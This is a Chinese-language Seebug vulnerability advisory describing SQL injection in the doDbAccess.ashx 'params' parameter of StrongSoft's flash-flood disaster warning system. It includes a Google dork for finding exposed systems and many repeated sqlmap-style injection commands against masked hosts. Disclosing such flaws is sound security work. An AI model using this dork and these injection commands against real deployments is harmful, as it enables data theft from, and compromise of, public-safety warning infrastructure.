StrongSoft灾害预警系统doDbAccess.ashx存在SQL注入漏洞

基本字段

漏洞编号：: SSV-90244

披露/发现时间：: 未知

提交时间：: 2016-01-09

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: Strongsoft

漏洞作者：: 未知

提交者：: 匿名

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 saminit 共获得 0KB

福建四创软件开发的“山洪灾害预警监测系统”存在SQL注入漏洞，可获取数据库任意数据，进而而导致预警系统沦陷。谷歌搜索： intitle:预警系统技术支持:福建四创 ![](https://images.seebug.org/1452309631547) 注入文件及参数:doDbAccess.ashx里的params 案例 "**.**.**.**:3505/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3505/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3050/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3505/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3505/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3050/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3050/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3505/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3505/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:8088/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:3503/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:8088/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:9001/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:8088/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:8088/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params "**.**.**.**:8088/Public/DataAccess/GeneralModule/doDbAccess.ashx?dateForAjax=364" --data "params=0125&sqlkey=Map%5FS%5FGetEnnuById%5FZWP" -p params

共 0 兑换了

PoC (pocsuite 插件) (pocsuite 插件)

贡献者 kikay 共获得 0KB

登陆后兑换查看

共 0 兑换

参考链接

http://www.wooyun.org/bugs/wooyun-2010-097446

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

StrongSoft灾害预警系统doDbAccess.ashx存在SQL注入漏洞

基本字段

来源

漏洞详情

PoC (pocsuite 插件) (pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

StrongSoft灾害预警系统doDbAccess.ashx存在SQL注入漏洞

基本字段

来源

漏洞详情

PoC (pocsuite 插件) (pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定